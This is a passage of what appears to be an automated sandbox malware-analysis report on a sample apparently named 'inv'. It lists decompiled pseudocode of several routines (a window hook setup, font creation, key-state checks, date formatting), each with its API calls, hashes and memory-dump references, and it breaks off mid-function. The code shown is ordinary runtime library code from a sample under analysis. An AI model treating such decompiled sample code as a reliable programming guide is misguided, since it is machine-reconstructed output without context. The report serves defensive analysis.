                                  • Instruction ID: 4e28035e85d50590b60fd1cab30387a01294cf3775af280d48c49e48b9c7f72e
                                  • Opcode Fuzzy Hash: 14e42b677e946c6b40f206c3b5b14c2a92358c2c0235b84ea2fa26aaedab912f
                                  • Instruction Fuzzy Hash: 19F020A232A6315792217B73BE818AF11CCDD42394B80403BFC80D22D4DB2DCC0282FD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00428DD0, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E00428DD0(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x44fb24; // 0x21912ac
					if(GlobalFindAtomA(E004042D0(_t5)) !=  *0x44fb1e) {
						_t15 = E00428D9C(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x44fb1e & 0x0000ffff);
					}
				}
				return _t15;
			}







                                  0x00428dd0
                                  0x00428dd2
                                  0x00428dd3
                                  0x00428dd5
                                  0x00428dd9
                                  0x00428df0
                                  0x00428e07
                                  0x00428e22
                                  0x00428e09
                                  0x00428e17
                                  0x00428e17
                                  0x00428e07
                                  0x00428e29

                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00428DDD
                                  • GetCurrentProcessId.KERNEL32(?,?,00000000,0044AEBB,?,?,0044C944,00000001,0044B027,?,?,?,0044C944), ref: 00428DE6
                                  • GlobalFindAtomA.KERNEL32 ref: 00428DFB
                                  • GetPropA.USER32 ref: 00428E12
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: ba7cf0c06c584b08bb2dfc983f4ffe8c357acdf5528f982da89ebd4fbb431b4d
                                  • Instruction ID: 9fa8f58df946c451fd89f97504a56d60844c3abe2df67e09c3138ab7398f1387
                                  • Opcode Fuzzy Hash: ba7cf0c06c584b08bb2dfc983f4ffe8c357acdf5528f982da89ebd4fbb431b4d
                                  • Instruction Fuzzy Hash: CDF0A06270223166DA20B7B6FD8182F22DCCD05399382483FF901E7286CE3CDC0582BC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00449AA8, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00449AA8(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x44fbb0; // 0x2191714
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x44fbc8 == 0) {
						_t2 = SetWindowsHookExA(3, E00449A64, 0, GetCurrentThreadId());
						 *0x44fbc8 = _t2;
					}
					if( *0x44fbc4 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x44fbc4 = _t2;
					}
					if( *0x44fbcc == 0) {
						_t2 = CreateThread(0, 0x3e8, E00449A08, 0, 0, _t7);
						 *0x44fbcc = _t2;
					}
				}
				return _t2;
			}





                                  0x00449aa9
                                  0x00449ab5
                                  0x00449abe
                                  0x00449ad0
                                  0x00449ad5
                                  0x00449ad5
                                  0x00449ae1
                                  0x00449aeb
                                  0x00449af0
                                  0x00449af0
                                  0x00449afc
                                  0x00449b0f
                                  0x00449b14
                                  0x00449b14
                                  0x00449afc
                                  0x00449b1a

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00449AC0
                                  • SetWindowsHookExA.USER32 ref: 00449AD0
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00449AEB
                                  • CreateThread.KERNEL32(00000000,000003E8,00449A08,00000000,00000000), ref: 00449B0F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CreateThread$CurrentEventHookWindows
                                  • String ID:
                                  • API String ID: 1195359707-0
                                  • Opcode ID: 771ba898037f9b404c22616256884bf9cab39921dfe3e221527c2129b78333f4
                                  • Instruction ID: ae2ff5243f0b01373a0a0d56d2626c96ffedc2f8609201df67394c329967d082
                                  • Opcode Fuzzy Hash: 771ba898037f9b404c22616256884bf9cab39921dfe3e221527c2129b78333f4
                                  • Instruction Fuzzy Hash: ADF03A746803C0BEF7109B11EC2BF272598E713B0AF50107FF2047A2D9D6B829889A5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F180, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E0041F180(void* __eflags) {
				intOrPtr _t13;
				intOrPtr _t19;
				void* _t20;

				DeleteObject( *(_t20 - 0x10));
				E00403874();
				E004038C8();
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x41f1d1);
				DeleteDC( *(_t20 - 0x1c));
				_t13 =  *((intOrPtr*)(_t20 - 0x18));
				_push(_t13);
				_push(0);
				L004064F8();
				if( *(_t20 - 0x10) != 0) {
					return GetObjectA( *(_t20 - 0x10), 0x54,  *(_t20 + 0xc));
				}
				return _t13;
			}






                                  0x0041f184
                                  0x0041f189
                                  0x0041f18e
                                  0x0041f195
                                  0x0041f198
                                  0x0041f19b
                                  0x0041f1a4
                                  0x0041f1a9
                                  0x0041f1ac
                                  0x0041f1ad
                                  0x0041f1af
                                  0x0041f1b8
                                  0x00000000
                                  0x0041f1c4
                                  0x0041f1c9

                                  APIs
                                  • DeleteObject.GDI32(?), ref: 0041F184
                                  • DeleteDC.GDI32(?), ref: 0041F1A4
                                  • 72E7B380.USER32(00000000,?,?,0041F1D1), ref: 0041F1AF
                                  • GetObjectA.GDI32(?,00000054,?), ref: 0041F1C4
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: DeleteObject$B380
                                  • String ID:
                                  • API String ID: 2559486108-0
                                  • Opcode ID: 7c334954e88b4c01f292aeea7feef128e9ec1885feaff5888003de74d532461c
                                  • Instruction ID: 33614a505fb9bdf8b6d7951bcc44fc4a6d5273dcdda0b1b0409f6eecb60bd1f9
                                  • Opcode Fuzzy Hash: 7c334954e88b4c01f292aeea7feef128e9ec1885feaff5888003de74d532461c
                                  • Instruction Fuzzy Hash: 24E03072644205AEEB00EBE6DC46BBE77A8EB44304F41483AB511A61C1C63C98448728
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406658, Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406658(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                  0x0040665b
                                  0x00406662
                                  0x00406667
                                  0x0040666d
                                  0x00406672

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Global$AllocHandleWire
                                  • String ID:
                                  • API String ID: 2210401237-0
                                  • Opcode ID: dd0af09868c75cb0275c6e7709d4b38ad3534b4c99d0890db1c8dd30b2df49b7
                                  • Instruction ID: 4c91e0f90ce5e5bcf0bd18554aae6042f314b8d243397295f91aa16475200aa5
                                  • Opcode Fuzzy Hash: dd0af09868c75cb0275c6e7709d4b38ad3534b4c99d0890db1c8dd30b2df49b7
                                  • Instruction Fuzzy Hash: 77B002F5864A0439E80473F7CC0FD3B101DD8907497D4496E3480B2582997C9A0009BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041BF14, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0041BF14(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41c09d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041C0A4);
					return E00403E34( &_v80, 3);
				} else {
					_t76 =  *0x44f8d8; // 0x2190a30
					E0041B258(_t76);
					_push(_t137);
					_push(0x41c075);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E00404074( &_v72, _v8 + 0x1b);
						if(E004079D0(_v72, "Default") != 0) {
							E00404074( &_v80, _v8 + 0x1b);
							E004081C0( &(_v68.lfFaceName), _v80);
						} else {
							E00404074( &_v76, "\rMS Sans Serif");
							E004081C0( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041C1F8(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41c07c);
					_t81 =  *0x44f8d8; // 0x2190a30
					return E0041B264(_t81);
				}
			}
















                                  0x0041bf15
                                  0x0041bf17
                                  0x0041bf1d
                                  0x0041bf20
                                  0x0041bf23
                                  0x0041bf26
                                  0x0041bf2a
                                  0x0041bf2b
                                  0x0041bf30
                                  0x0041bf33
                                  0x0041bf39
                                  0x0041bf43
                                  0x0041c087
                                  0x0041c08a
                                  0x0041c09c
                                  0x0041bf49
                                  0x0041bf49
                                  0x0041bf4e
                                  0x0041bf55
                                  0x0041bf56
                                  0x0041bf5b
                                  0x0041bf5e
                                  0x0041bf68
                                  0x0041bf74
                                  0x0041bf79
                                  0x0041bf7e
                                  0x0041bf83
                                  0x0041bf8d
                                  0x0041bf98
                                  0x0041bf8f
                                  0x0041bf8f
                                  0x0041bf8f
                                  0x0041bfa9
                                  0x0041bfb6
                                  0x0041bfc3
                                  0x0041bfcc
                                  0x0041bfd8
                                  0x0041bfec
                                  0x0041c011
                                  0x0041c01c
                                  0x0041bfee
                                  0x0041bff6
                                  0x0041c001
                                  0x0041c001
                                  0x0041c021
                                  0x0041c025
                                  0x0041c029
                                  0x0041c034
                                  0x0041c036
                                  0x0041c03e
                                  0x0041c038
                                  0x0041c03a
                                  0x0041c044
                                  0x0041c03c
                                  0x0041c04a
                                  0x0041c04a
                                  0x0041c03a
                                  0x0041c05a
                                  0x0041c05a
                                  0x0041c05f
                                  0x0041c062
                                  0x0041c065
                                  0x0041c06a
                                  0x0041c074
                                  0x0041c074

                                  APIs
                                    • Part of subcall function 0041B258: RtlEnterCriticalSection.KERNEL32(?,0041B295), ref: 0041B25C
                                  • CreateFontIndirectA.GDI32(?), ref: 0041C052
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CreateCriticalEnterFontIndirectSection
                                  • String ID: MS Sans Serif$Default
                                  • API String ID: 2931345757-2137701257
                                  • Opcode ID: 15e5fc313b2ea2672533761faba1647e245f8d16613775bf8d119fffa8f19717
                                  • Instruction ID: 4f4b8599f795875a76f08e3564f3cc0d64f2e4023db53973bc2c8d05bd773dce
                                  • Opcode Fuzzy Hash: 15e5fc313b2ea2672533761faba1647e245f8d16613775bf8d119fffa8f19717
                                  • Instruction Fuzzy Hash: 89515D30A44248DFDB01CFA8C985BCDBBF5EF49304F2580AAE804A7352D3789E45DB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B484, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0040B484(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40b63f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x44dfc0; // 0x4069d8
					E00405910(_t52,  &_v8);
				} else {
					_t86 =  *0x44e118; // 0x4069d0
					E00405910(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x44dfcc; // 0x406980
					E00405910(_t60,  &_v372);
					E0040B0AC(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00404080( &_v340, 0x105,  &_v297);
					E00408040(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x44e028; // 0x406a78
					E00405910(_t82,  &_v344);
					E0040B0AC(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040B646);
				E00403E10( &_v372);
				E00403E34( &_v344, 3);
				return E00403E10( &_v8);
			}

































                                  0x0040b484
                                  0x0040b491
                                  0x0040b497
                                  0x0040b49d
                                  0x0040b4a3
                                  0x0040b4a9
                                  0x0040b4ae
                                  0x0040b4af
                                  0x0040b4b4
                                  0x0040b4b7
                                  0x0040b4bd
                                  0x0040b4c4
                                  0x0040b4d8
                                  0x0040b4dd
                                  0x0040b4c6
                                  0x0040b4c9
                                  0x0040b4ce
                                  0x0040b4ce
                                  0x0040b4e2
                                  0x0040b4ef
                                  0x0040b4fb
                                  0x0040b5b7
                                  0x0040b5bd
                                  0x0040b5c7
                                  0x0040b5cd
                                  0x0040b5d4
                                  0x0040b5da
                                  0x0040b5f0
                                  0x0040b5f5
                                  0x0040b607
                                  0x0040b51e
                                  0x0040b521
                                  0x0040b527
                                  0x0040b53f
                                  0x0040b550
                                  0x0040b55b
                                  0x0040b561
                                  0x0040b56b
                                  0x0040b571
                                  0x0040b578
                                  0x0040b57e
                                  0x0040b594
                                  0x0040b599
                                  0x0040b5ab
                                  0x0040b5b0
                                  0x0040b610
                                  0x0040b613
                                  0x0040b616
                                  0x0040b621
                                  0x0040b631
                                  0x0040b63e

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040B63F), ref: 0040B4EF
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040B63F), ref: 0040B511
                                    • Part of subcall function 00405910: LoadStringA.USER32 ref: 00405941
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                  • String ID: xj@
                                  • API String ID: 902310565-1282220615
                                  • Opcode ID: 504990ac6bcb2f19d502f07f8d58a56d2b499871b1a821fc19a288371ebdd347
                                  • Instruction ID: b80f6a5a7135726d1858f78814a1b34a57ad59531f4df85fb4d22ac48566557d
                                  • Opcode Fuzzy Hash: 504990ac6bcb2f19d502f07f8d58a56d2b499871b1a821fc19a288371ebdd347
                                  • Instruction Fuzzy Hash: 7A410770900658DFDB60DF65CC85BDAB7F4EB48304F4044EAE408A7291D779AE84CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043ED50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E0043ED50(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x44fba4; // 0x2190da8
					E00421948(_t34,  &_v24);
					_push(_t69);
					_push(0x43ee4e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E0043EA54(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x43ee55);
							_t40 =  *0x44fba4; // 0x2190da8
							return E00421940(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x44fba4; // 0x2190da8
					E00421948(_t42,  &_v8);
					_push(_t69);
					_push(0x43ee23);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E0043EBFC( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x43ee2a);
					_t48 =  *0x44fba4; // 0x2190da8
					return E00421940(_t48);
				}
				L14:
			}


















                                  0x0043ed51
                                  0x0043ed53
                                  0x0043ed57
                                  0x0043ed59
                                  0x0043ed63
                                  0x0043ed6c
                                  0x0043ee6b
                                  0x0043ed72
                                  0x0043ed7c
                                  0x0043ed7e
                                  0x0043ed7e
                                  0x0043ed8e
                                  0x0043ed90
                                  0x0043ed90
                                  0x0043ed9a
                                  0x0043ed9c
                                  0x0043ed9c
                                  0x0043eda8
                                  0x0043edae
                                  0x0043edb3
                                  0x0043edba
                                  0x0043edbb
                                  0x0043edc0
                                  0x0043edc3
                                  0x0043edc6
                                  0x0043edc6
                                  0x0043edd8
                                  0x0043eddf
                                  0x00000000
                                  0x00000000
                                  0x0043ee2e
                                  0x0043ee38
                                  0x0043ee3b
                                  0x0043ee3e
                                  0x0043ee43
                                  0x0043ee4d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0043ee2e
                                  0x0043ede4
                                  0x0043ede9
                                  0x0043edf0
                                  0x0043edf1
                                  0x0043edf6
                                  0x0043edf9
                                  0x0043ee08
                                  0x0043ee0d
                                  0x0043ee10
                                  0x0043ee13
                                  0x0043ee18
                                  0x0043ee22
                                  0x0043ee22
                                  0x00000000

                                  APIs
                                  • GetKeyState.USER32(00000010), ref: 0043ED74
                                  • GetKeyState.USER32(00000011), ref: 0043ED86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: State
                                  • String ID:
                                  • API String ID: 1649606143-3916222277
                                  • Opcode ID: 3c257ecfa46ef8cfa8d46a62b131d070b30a5a9394f877d8deeb70aa2bb7f02d
                                  • Instruction ID: 4f76d382704f7fb224acd00f04b480a3934c04ed790ce385eac2d8e81479b68b
                                  • Opcode Fuzzy Hash: 3c257ecfa46ef8cfa8d46a62b131d070b30a5a9394f877d8deeb70aa2bb7f02d
                                  • Instruction Fuzzy Hash: 89312731E05248EFDB11DFA6D81279EB7F5EF4D314F5180BAE804AA2E1E7785A00C618
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409684, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00409684(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x409762);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E10(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403EA8( &_v8, 0x409784);
				} else {
					E00403EA8( &_v8, 0x409778);
				}
				_t32 = E004042D0(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00404080(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E00404330( *_t49, E004040D0( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00409769);
				return E00403E10( &_v8);
			}













                                  0x00409691
                                  0x00409694
                                  0x00409696
                                  0x0040969a
                                  0x0040969b
                                  0x004096a0
                                  0x004096a3
                                  0x004096a8
                                  0x004096b4
                                  0x004096bf
                                  0x004096ca
                                  0x004096d1
                                  0x004096ea
                                  0x004096d3
                                  0x004096db
                                  0x004096db
                                  0x004096fe
                                  0x00409717
                                  0x00409726
                                  0x0040972c
                                  0x00409747
                                  0x00409747
                                  0x0040972c
                                  0x0040974e
                                  0x00409751
                                  0x00409754
                                  0x00409761

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00409762), ref: 0040970A
                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00409762), ref: 00409710
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: DateFormatLocaleThread
                                  • String ID: yyyy
                                  • API String ID: 3303714858-3145165042
                                  • Opcode ID: 9766ac0e910df15fb4758d2c7b9f1ccb5d830caef30e88c180c22abfecdeeb57
                                  • Instruction ID: e2a26f48646bc91a1725cc249aff767ba32fc1c342cb51e6fb829c96139d47bf
                                  • Opcode Fuzzy Hash: 9766ac0e910df15fb4758d2c7b9f1ccb5d830caef30e88c180c22abfecdeeb57
                                  • Instruction Fuzzy Hash: A52162756106089BDB01EF65C942AEFB7A8EF48300F50447AF944F7392D7789E408669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042C270, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042C270(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

